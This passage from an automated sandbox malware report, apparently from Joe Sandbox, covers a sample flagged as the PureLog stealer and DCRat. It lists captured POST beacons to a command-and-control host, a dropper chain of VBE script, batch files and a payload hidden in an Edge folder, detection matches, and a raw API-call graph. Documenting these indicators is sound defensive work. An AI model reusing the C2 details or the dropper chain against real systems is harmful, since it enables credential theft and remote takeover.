                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49961 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:19:12.122773886 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:19:12.473037958 CET | 2644 | OUT | (request body data)
Dec 20, 2024 21:19:13.391532898 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:19:13.625479937 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49969 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:19:13.884423018 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:19:15.155226946 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:19:19.673058033 CET | 2644 | OUT | (request body data)
Dec 20, 2024 21:19:20.148821115 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Target ID:0
                                                                                                                      Start time:15:17:07
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\8k1e14tjcx.exe"
                                                                                                                      Imagebase:0xe90000
                                                                                                                      File size:2'365'778 bytes
                                                                                                                      MD5 hash:517D21CBE45C2A88930AA345C2A5C36B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1697920956.0000000005878000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:1
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe"
                                                                                                                      Imagebase:0x1f0000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "
                                                                                                                      Imagebase:0x240000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\ChainagentComponent/ChainFontruntimeCrt.exe"
                                                                                                                      Imagebase:0x210000
                                                                                                                      File size:2'043'904 bytes
                                                                                                                      MD5 hash:64105CB19AC25A6275C7D929937090A0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1706629169.0000000000212000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 83%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat"
                                                                                                                      Imagebase:0x7ff7f7f10000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:chcp 65001
                                                                                                                      Imagebase:0x7ff638340000
                                                                                                                      File size:14'848 bytes
                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:ping -n 10 localhost
                                                                                                                      Imagebase:0x7ff699850000
                                                                                                                      File size:22'528 bytes
                                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:15:17:22
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe"
                                                                                                                      Imagebase:0x580000
                                                                                                                      File size:2'043'904 bytes
                                                                                                                      MD5 hash:64105CB19AC25A6275C7D929937090A0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 83%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:9.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:9.3%
                                                                                                                        Total number of Nodes:1503
                                                                                                                        Total number of Limit Nodes:43
24419->24422 24427 e9a709 24419->24427 24421 e9a732 GetLastError 24420->24421 24420->24427 24421->24427 24423 e9bb03 GetCurrentDirectoryW 24422->24423 24424 e9a6e0 24423->24424 24425 e9a6fe GetLastError 24424->24425 24426 e9a6e4 FindFirstFileW 24424->24426 24425->24427 24426->24425 24426->24427 24427->24001 24437 eaa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24428->24437 24430 eaa5cd 24431 eaa5d9 24430->24431 24438 eaa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24430->24438 24431->23645 24431->23646 24433->23649 24434->23655 24435->23655 24436->23658 24437->24430 24438->24431 24439->23666 24441 e99f42 78 API calls 24440->24441 24442 e91fe8 24441->24442 24443 e91a04 101 API calls 24442->24443 24446 e92005 24442->24446 24444 e91ff5 24443->24444 24444->24446 24447 e9138b 74 API calls 24444->24447 24446->23674 24446->23675 24447->24446 24449 eab5bc GetDlgItem 24448->24449 24450 eab583 GetMessageW 24448->24450 24449->23685 24449->23686 24451 eab5a8 TranslateMessage DispatchMessageW 24450->24451 24452 eab599 IsDialogMessageW 24450->24452 24451->24449 24452->24449 24452->24451 25264 ea94e0 GetClientRect 25301 ea21e0 26 API calls std::bad_exception::bad_exception 25326 eaf2e0 46 API calls __RTC_Initialize 25327 ebbee0 GetCommandLineA GetCommandLineW 24453 eaeae7 24454 eaeaf1 24453->24454 24455 eae85d ___delayLoadHelper2@8 14 API calls 24454->24455 24456 eaeafe 24455->24456 25265 eaf4e7 29 API calls _abort 25266 eb2cfb 38 API calls 4 library calls 25302 e995f0 80 API calls 25328 e95ef0 82 API calls 24473 eb98f0 24481 ebadaf 24473->24481 24477 eb9919 24478 eb990c 24478->24477 24489 eb9920 11 API calls 24478->24489 24480 eb9904 24490 ebac98 24481->24490 24484 ebadee TlsAlloc 24485 ebaddf 24484->24485 24486 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24485->24486 24487 eb98fa 24486->24487 24487->24480 24488 eb9869 20 API calls 2 library calls 24487->24488 24488->24478 24489->24480 24491 ebacc8 24490->24491 24494 ebacc4 24490->24494 
24491->24484 24491->24485 24492 ebace8 24492->24491 24495 ebacf4 GetProcAddress 24492->24495 24494->24491 24494->24492 24497 ebad34 24494->24497 24496 ebad04 _abort 24495->24496 24496->24491 24498 ebad4a 24497->24498 24499 ebad55 LoadLibraryExW 24497->24499 24498->24494 24500 ebad72 GetLastError 24499->24500 24501 ebad8a 24499->24501 24500->24501 24502 ebad7d LoadLibraryExW 24500->24502 24501->24498 24503 ebada1 FreeLibrary 24501->24503 24502->24501 24503->24498 24504 ebabf0 24505 ebabfb 24504->24505 24507 ebac24 24505->24507 24509 ebac20 24505->24509 24510 ebaf0a 24505->24510 24517 ebac50 DeleteCriticalSection 24507->24517 24511 ebac98 _abort 5 API calls 24510->24511 24512 ebaf31 24511->24512 24513 ebaf3a 24512->24513 24514 ebaf4f InitializeCriticalSectionAndSpinCount 24512->24514 24515 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24513->24515 24514->24513 24516 ebaf66 24515->24516 24516->24505 24517->24509 25267 eb88f0 7 API calls ___scrt_uninitialize_crt 25304 eafd4f 9 API calls 2 library calls 25329 ea62ca 123 API calls __InternalCxxFrameHandler 24530 eadec2 24531 eadecf 24530->24531 24532 e9e617 53 API calls 24531->24532 24533 eadedc 24532->24533 24534 e94092 _swprintf 51 API calls 24533->24534 24535 eadef1 SetDlgItemTextW 24534->24535 24536 eab568 5 API calls 24535->24536 24537 eadf0e 24536->24537 25305 eab5c0 100 API calls 25344 ea77c0 118 API calls 25345 eaffc0 RaiseException _com_raise_error _com_error::_com_error 25331 eb0ada 51 API calls 2 library calls 25270 eaf4d3 20 API calls 24605 eae1d1 14 API calls ___delayLoadHelper2@8 25346 eba3d0 21 API calls 2 library calls 24606 e910d5 24611 e95abd 24606->24611 24612 e95ac7 __EH_prolog 24611->24612 24613 e9b505 84 API calls 24612->24613 24614 e95ad3 24613->24614 24618 e95cac GetCurrentProcess GetProcessAffinityMask 24614->24618 25347 ec2bd0 VariantClear 24619 eae2d7 24620 eae1db 24619->24620 24621 eae85d ___delayLoadHelper2@8 14 API calls 24620->24621 24621->24620 25348 e96faa 111 
API calls 3 library calls 25349 eaf3a0 27 API calls 25273 eba4a0 71 API calls _free 25274 eadca1 DialogBoxParamW 25275 ec08a0 IsProcessorFeaturePresent 25308 eaeda7 48 API calls _unexpected 25350 ea1bbd GetCPInfo IsDBCSLeadByte 24636 eaf3b2 24637 eaf3be __FrameHandler3::FrameUnwindToState 24636->24637 24668 eaeed7 24637->24668 24639 eaf518 24741 eaf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24639->24741 24641 eaf51f 24734 eb7f58 24641->24734 24642 eaf3c5 24642->24639 24643 eaf3ef 24642->24643 24656 eaf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24643->24656 24679 eb8aed 24643->24679 24650 eaf40e 24652 eaf48f 24687 eaf953 GetStartupInfoW _abort 24652->24687 24654 eaf495 24688 eb8a3e 51 API calls 24654->24688 24656->24652 24737 eb7af4 38 API calls _abort 24656->24737 24657 eaf49d 24689 eadf1e 24657->24689 24662 eaf4b1 24662->24641 24663 eaf4b5 24662->24663 24664 eaf4be 24663->24664 24739 eb7efb 28 API calls _abort 24663->24739 24740 eaf048 12 API calls ___scrt_uninitialize_crt 24664->24740 24667 eaf4c6 24667->24650 24669 eaeee0 24668->24669 24743 eaf654 IsProcessorFeaturePresent 24669->24743 24671 eaeeec 24744 eb2a5e 24671->24744 24673 eaeef1 24674 eaeef5 24673->24674 24752 eb8977 24673->24752 24674->24642 24677 eaef0c 24677->24642 24680 eb8b04 24679->24680 24681 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24680->24681 24682 eaf408 24681->24682 24682->24650 24683 eb8a91 24682->24683 24684 eb8ac0 24683->24684 24685 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24684->24685 24686 eb8ae9 24685->24686 24686->24656 24687->24654 24688->24657 24845 ea0863 24689->24845 24693 eadf3d 24894 eaac16 24693->24894 24695 eadf46 _abort 24696 eadf59 GetCommandLineW 24695->24696 24697 eadf68 24696->24697 24698 eadfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24696->24698 24898 eac5c4 24697->24898 24699 e94092 _swprintf 51 
API calls 24698->24699 24701 eae04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24699->24701 24909 eab6dd LoadBitmapW 24701->24909 24704 eadfe0 24903 eadbde 24704->24903 24705 eadf76 OpenFileMappingW 24708 eadf8f MapViewOfFile 24705->24708 24709 eadfd6 CloseHandle 24705->24709 24711 eadfcd UnmapViewOfFile 24708->24711 24712 eadfa0 __InternalCxxFrameHandler 24708->24712 24709->24698 24711->24709 24715 eadbde 2 API calls 24712->24715 24717 eadfbc 24715->24717 24717->24711 24718 ea90b7 8 API calls 24719 eae0aa DialogBoxParamW 24718->24719 24720 eae0e4 24719->24720 24721 eae0fd 24720->24721 24722 eae0f6 Sleep 24720->24722 24725 eae10b 24721->24725 24939 eaae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24721->24939 24722->24721 24724 eae12a DeleteObject 24726 eae13f DeleteObject 24724->24726 24727 eae146 24724->24727 24725->24724 24726->24727 24728 eae189 24727->24728 24729 eae177 24727->24729 24936 eaac7c 24728->24936 24940 eadc3b 6 API calls 24729->24940 24732 eae17d CloseHandle 24732->24728 24733 eae1c3 24738 eaf993 GetModuleHandleW 24733->24738 25070 eb7cd5 24734->25070 24737->24652 24738->24662 24739->24664 24740->24667 24741->24641 24743->24671 24756 eb3b07 24744->24756 24747 eb2a67 24747->24673 24749 eb2a6f 24750 eb2a7a 24749->24750 24770 eb3b43 DeleteCriticalSection 24749->24770 24750->24673 24799 ebc05a 24752->24799 24755 eb2a7d 7 API calls 2 library calls 24755->24674 24757 eb3b10 24756->24757 24759 eb3b39 24757->24759 24761 eb2a63 24757->24761 24771 eb3d46 24757->24771 24776 eb3b43 DeleteCriticalSection 24759->24776 24761->24747 24762 eb2b8c 24761->24762 24792 eb3c57 24762->24792 24766 eb2bbc 24766->24749 24767 eb2baf 24767->24766 24798 eb2bbf 6 API calls ___vcrt_FlsFree 24767->24798 24769 eb2ba1 24769->24749 24770->24747 24777 eb3c0d 24771->24777 24774 eb3d7e InitializeCriticalSectionAndSpinCount 24775 eb3d69 24774->24775 24775->24757 24776->24761 24778 eb3c4f 24777->24778 24779 eb3c26 24777->24779 24778->24774 24778->24775 24779->24778 24784 
eb3b72 24779->24784 24782 eb3c3b GetProcAddress 24782->24778 24783 eb3c49 24782->24783 24783->24778 24785 eb3b7e ___vcrt_InitializeCriticalSectionEx 24784->24785 24786 eb3bf3 24785->24786 24787 eb3b95 LoadLibraryExW 24785->24787 24791 eb3bd5 LoadLibraryExW 24785->24791 24786->24778 24786->24782 24788 eb3bfa 24787->24788 24789 eb3bb3 GetLastError 24787->24789 24788->24786 24790 eb3c02 FreeLibrary 24788->24790 24789->24785 24790->24786 24791->24785 24791->24788 24793 eb3c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24792->24793 24794 eb3c71 24793->24794 24795 eb3c8a TlsAlloc 24794->24795 24796 eb2b96 24794->24796 24796->24769 24797 eb3d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24796->24797 24797->24767 24798->24769 24802 ebc077 24799->24802 24803 ebc073 24799->24803 24800 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24801 eaeefe 24800->24801 24801->24677 24801->24755 24802->24803 24805 eba6a0 24802->24805 24803->24800 24806 eba6ac __FrameHandler3::FrameUnwindToState 24805->24806 24817 ebac31 EnterCriticalSection 24806->24817 24808 eba6b3 24818 ebc528 24808->24818 24810 eba6c2 24811 eba6d1 24810->24811 24831 eba529 29 API calls 24810->24831 24833 eba6ed LeaveCriticalSection _abort 24811->24833 24814 eba6cc 24832 eba5df GetStdHandle GetFileType 24814->24832 24815 eba6e2 _abort 24815->24802 24817->24808 24819 ebc534 __FrameHandler3::FrameUnwindToState 24818->24819 24820 ebc558 24819->24820 24821 ebc541 24819->24821 24834 ebac31 EnterCriticalSection 24820->24834 24842 eb91a8 20 API calls __dosmaperr 24821->24842 24824 ebc546 24843 eb9087 26 API calls ___std_exception_copy 24824->24843 24826 ebc590 24844 ebc5b7 LeaveCriticalSection _abort 24826->24844 24827 ebc550 _abort 24827->24810 24830 ebc564 24830->24826 24835 ebc479 24830->24835 24831->24814 24832->24811 24833->24815 24834->24830 24836 ebb136 _abort 20 API calls 24835->24836 24838 ebc48b 24836->24838 24837 ebc498 24839 eb8dcc _free 20 API calls 24837->24839 24838->24837 
24840 ebaf0a 11 API calls 24838->24840 24841 ebc4ea 24839->24841 24840->24838 24841->24830 24842->24824 24843->24827 24844->24827 24846 eaec50 24845->24846 24847 ea086d GetModuleHandleW 24846->24847 24848 ea0888 GetProcAddress 24847->24848 24849 ea08e7 24847->24849 24851 ea08b9 GetProcAddress 24848->24851 24852 ea08a1 24848->24852 24850 ea0c14 GetModuleFileNameW 24849->24850 24950 eb75fb 42 API calls 2 library calls 24849->24950 24861 ea0c32 24850->24861 24854 ea08cb 24851->24854 24852->24851 24854->24849 24855 ea0b54 24855->24850 24856 ea0b5f GetModuleFileNameW CreateFileW 24855->24856 24857 ea0c08 CloseHandle 24856->24857 24858 ea0b8f SetFilePointer 24856->24858 24857->24850 24858->24857 24859 ea0b9d ReadFile 24858->24859 24859->24857 24863 ea0bbb 24859->24863 24864 ea0c94 GetFileAttributesW 24861->24864 24866 ea0c5d CompareStringW 24861->24866 24867 ea0cac 24861->24867 24941 e9b146 24861->24941 24944 ea081b 24861->24944 24863->24857 24865 ea081b 2 API calls 24863->24865 24864->24861 24864->24867 24865->24863 24866->24861 24868 ea0cb7 24867->24868 24871 ea0cec 24867->24871 24870 ea0cd0 GetFileAttributesW 24868->24870 24872 ea0ce8 24868->24872 24869 ea0dfb 24893 eaa64d GetCurrentDirectoryW 24869->24893 24870->24868 24870->24872 24871->24869 24873 e9b146 GetVersionExW 24871->24873 24872->24871 24874 ea0d06 24873->24874 24875 ea0d0d 24874->24875 24876 ea0d73 24874->24876 24877 ea081b 2 API calls 24875->24877 24878 e94092 _swprintf 51 API calls 24876->24878 24879 ea0d17 24877->24879 24880 ea0d9b AllocConsole 24878->24880 24881 ea081b 2 API calls 24879->24881 24882 ea0da8 GetCurrentProcessId AttachConsole 24880->24882 24883 ea0df3 ExitProcess 24880->24883 24885 ea0d21 24881->24885 24951 eb3e13 24882->24951 24887 e9e617 53 API calls 24885->24887 24886 ea0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24886->24883 24888 ea0d3c 24887->24888 24889 e94092 _swprintf 51 API calls 24888->24889 24890 ea0d4f 24889->24890 24891 e9e617 53 API calls 24890->24891 24892 ea0d5e 
24891->24892 24892->24883 24893->24693 24895 ea081b 2 API calls 24894->24895 24896 eaac2a OleInitialize 24895->24896 24897 eaac4d GdiplusStartup SHGetMalloc 24896->24897 24897->24695 24900 eac5ce 24898->24900 24899 eac6e4 24899->24704 24899->24705 24900->24899 24901 ea1fac CharUpperW 24900->24901 24953 e9f3fa 82 API calls 2 library calls 24900->24953 24901->24900 24904 eaec50 24903->24904 24905 eadbeb SetEnvironmentVariableW 24904->24905 24907 eadc0e 24905->24907 24906 eadc36 24906->24698 24907->24906 24908 eadc2a SetEnvironmentVariableW 24907->24908 24908->24906 24910 eab70b GetObjectW 24909->24910 24911 eab6fe 24909->24911 24913 eab71a 24910->24913 24954 eaa6c2 FindResourceW 24911->24954 24915 eaa5c6 4 API calls 24913->24915 24917 eab72d 24915->24917 24916 eab770 24928 e9da42 24916->24928 24917->24916 24918 eab74c 24917->24918 24920 eaa6c2 12 API calls 24917->24920 24968 eaa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24918->24968 24922 eab73d 24920->24922 24921 eab754 24969 eaa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24921->24969 24922->24918 24924 eab743 DeleteObject 24922->24924 24924->24918 24925 eab75d 24970 eaa80c 8 API calls 24925->24970 24927 eab764 DeleteObject 24927->24916 24979 e9da67 24928->24979 24933 ea90b7 24934 eaeb38 8 API calls 24933->24934 24935 ea90d6 24934->24935 24935->24718 24937 eaacab GdiplusShutdown CoUninitialize 24936->24937 24937->24733 24939->24725 24940->24732 24942 e9b15a GetVersionExW 24941->24942 24943 e9b196 24941->24943 24942->24943 24943->24861 24945 eaec50 24944->24945 24946 ea0828 GetSystemDirectoryW 24945->24946 24947 ea085e 24946->24947 24948 ea0840 24946->24948 24947->24861 24949 ea0851 LoadLibraryW 24948->24949 24949->24947 24950->24855 24952 eb3e1b 24951->24952 24952->24886 24952->24952 24953->24900 24955 eaa7d3 24954->24955 24956 eaa6e5 SizeofResource 24954->24956 24955->24910 24955->24913 24956->24955 24957 eaa6fc LoadResource 24956->24957 24957->24955 24958 eaa711 LockResource 24957->24958 24958->24955 
24959 eaa722 GlobalAlloc 24958->24959 24959->24955 24960 eaa73d GlobalLock 24959->24960 24961 eaa7cc GlobalFree 24960->24961 24962 eaa74c __InternalCxxFrameHandler 24960->24962 24961->24955 24963 eaa7c5 GlobalUnlock 24962->24963 24971 eaa626 GdipAlloc 24962->24971 24963->24961 24966 eaa79a GdipCreateHBITMAPFromBitmap 24967 eaa7b0 24966->24967 24967->24963 24968->24921 24969->24925 24970->24927 24972 eaa638 24971->24972 24973 eaa645 24971->24973 24975 eaa3b9 24972->24975 24973->24963 24973->24966 24973->24967 24976 eaa3da GdipCreateBitmapFromStreamICM 24975->24976 24977 eaa3e1 GdipCreateBitmapFromStream 24975->24977 24978 eaa3e6 24976->24978 24977->24978 24978->24973 24980 e9da75 _wcschr __EH_prolog 24979->24980 24981 e9daa4 GetModuleFileNameW 24980->24981 24982 e9dad5 24980->24982 24983 e9dabe 24981->24983 25025 e998e0 24982->25025 24983->24982 24985 e9db31 25036 eb6310 24985->25036 24986 e9959a 80 API calls 24988 e9da4e 24986->24988 24987 e9e261 78 API calls 24990 e9db05 24987->24990 25023 e9e29e GetModuleHandleW FindResourceW 24988->25023 24990->24985 24990->24987 25003 e9dd4a 24990->25003 24991 e9db44 24992 eb6310 26 API calls 24991->24992 25000 e9db56 ___vcrt_InitializeCriticalSectionEx 24992->25000 24993 e9dc85 24993->25003 25056 e99d70 81 API calls 24993->25056 24995 e99e80 79 API calls 24995->25000 24997 e9dc9f ___std_exception_copy 24998 e99bd0 82 API calls 24997->24998 24997->25003 25001 e9dcc8 ___std_exception_copy 24998->25001 25000->24993 25000->24995 25000->25003 25050 e99bd0 25000->25050 25055 e99d70 81 API calls 25000->25055 25001->25003 25020 e9dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25001->25020 25057 ea1b84 MultiByteToWideChar 25001->25057 25003->24986 25004 e9e159 25008 e9e1de 25004->25008 25063 eb8cce 26 API calls ___std_exception_copy 25004->25063 25006 e9e16e 25064 eb7625 26 API calls ___std_exception_copy 25006->25064 25009 e9e214 25008->25009 25013 e9e261 78 API calls 25008->25013 25014 eb6310 26 API calls 
